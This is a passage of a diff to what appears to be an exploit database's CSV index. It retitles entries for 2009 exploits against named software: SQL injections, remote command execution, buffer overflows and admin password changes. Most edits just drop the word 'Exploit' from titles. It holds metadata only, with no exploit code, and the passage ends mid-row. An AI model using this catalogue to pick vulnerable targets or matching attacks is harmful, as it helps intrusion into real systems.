+8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - (news_id) SQL Injection",2009-05-04,snakespc,php,webapps,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 8602,platforms/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusion",2009-05-04,ahmadbady,php,webapps,0 -8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 +8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution",2009-05-04,G4N0K,php,webapps,0 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 -8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 -8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 +8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps,0 +8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,asp,webapps,0 8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - Banner Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0 8612,platforms/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 -8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD response) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 +8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD Response) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - (Banner) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8615,platforms/php/webapps/8615.txt,"tematres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0 8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,php,webapps,0 8619,platforms/php/webapps/8619.txt,"Joomla Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps,0 -8620,platforms/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow Exploit",2009-05-05,Stack,windows,local,0 -8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - (CWD Response) Universal Seh Overwrite",2009-05-05,His0k4,windows,remote,0 +8620,platforms/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow",2009-05-05,Stack,windows,local,0 +8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - (CWD Response) Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0 8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0 8623,platforms/windows/remote/8623.rb,"32bit FTP - (PASV) Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0 8624,platforms/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,windows,local,0 @@ -8135,16 +8136,16 @@ id,file,description,date,author,platform,type,port 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 8628,platforms/windows/local/8628.pl,"RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Buffer Overflow",2009-05-07,G4N0K,windows,local,0 -8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 +8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8631,platforms/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 -8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 -8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 -8634,platforms/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 +8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8634,platforms/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0 8637,platforms/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",windows,local,0 -8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password Exploit",2009-05-07,ahmadbady,php,webapps,0 -8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password Exploit",2009-05-07,TiGeR-Dz,php,webapps,0 +8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0 +8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0 8640,platforms/windows/local/8640.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Stack Overflow",2009-05-07,Hakxer,windows,local,0 8641,platforms/multiple/local/8641.txt,"PHP - mb_ereg(i)_replace() Evaluate Replacement String",2009-05-07,80vul,multiple,local,0 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0 @@ -8156,12 +8157,12 @@ id,file,description,date,author,platform,type,port 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 -8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 -8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal Exploit",2009-05-11,StAkeR,php,webapps,0 -8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / File Upload",2009-05-11,ahmadbady,php,webapps,0 +8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0 +8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 +8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 -8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Seh Overwrite",2009-05-11,His0k4,windows,local,0 +8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Overwrite (SEH)",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0 @@ -8169,7 +8170,7 @@ id,file,description,date,author,platform,type,port 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local,0 -8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - 'username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - ''Username'' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 @@ -8186,7 +8187,7 @@ id,file,description,date,author,platform,type,port 8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation",2009-05-14,prdelka,linux,local,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0 -8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0 +8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8683,platforms/php/webapps/8683.txt,"Submitter Script - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 @@ -8203,7 +8204,7 @@ id,file,description,date,author,platform,type,port 8696,platforms/hardware/remote/8696.txt,"D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow",2009-05-15,hack4love,windows,local,0 -8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 +8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 @@ -8217,12 +8218,12 @@ id,file,description,date,author,platform,type,port 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 -8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 +8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 -8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 -8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 +8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21 +8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 -8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 +8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0 8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service",2009-05-18,Stack,windows,dos,0 @@ -8230,11 +8231,11 @@ id,file,description,date,author,platform,type,port 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 -8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 +8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps,0 8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0 -8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 -8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow Exploit",2009-05-19,rgod,windows,remote,0 +8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21 +8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow",2009-05-19,rgod,windows,remote,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 @@ -8254,8 +8255,8 @@ id,file,description,date,author,platform,type,port 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 -8753,platforms/osx/remote/8753.txt,"Apple Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 -8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 +8753,platforms/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 +8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0 @@ -8265,16 +8266,16 @@ id,file,description,date,author,platform,type,port 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0 -8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 +8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,windows,remote,0 8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS - (user_id) SQL Injection",2009-05-22,Qabandi,php,webapps,0 -8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Seh Overwrite",2009-05-22,His0k4,windows,local,0 +8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Overwrite (SEH)",2009-05-22,His0k4,windows,local,0 8771,platforms/php/webapps/8771.htm,"ZaoCMS - 'user_updated.php' Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 8772,platforms/windows/local/8772.pl,"Winamp 5.55 - (MAKI script) Universal Integer Overflow",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 -8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0 -8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 -8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Pass",2009-05-22,G4N0K,php,webapps,0 +8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary File Upload",2009-05-22,Qabandi,php,webapps,0 +8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Password",2009-05-22,G4N0K,php,webapps,0 +8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Password",2009-05-22,G4N0K,php,webapps,0 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 @@ -8305,11 +8306,11 @@ id,file,description,date,author,platform,type,port 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,windows,remote,2242 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Perl) (2)",2009-05-26,ka0x,windows,remote,0 -8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 +8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 -8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 +8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 -8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Remote File Upload",2009-05-26,ByALBAYX,php,webapps,0 +8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0 8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 @@ -8322,9 +8323,9 @@ id,file,description,date,author,platform,type,port 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 -8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote Buffer Overflow Exploit",2009-05-29,snakespc,windows,remote,0 +8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 -8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OS X/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 +8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 @@ -8333,7 +8334,7 @@ id,file,description,date,author,platform,type,port 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 -8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote Buffer Overflow Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 +8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote Buffer Overflow (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 @@ -8358,7 +8359,7 @@ id,file,description,date,author,platform,type,port 8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - GLOBALS[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 -8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler Buffer Overflow Exploit 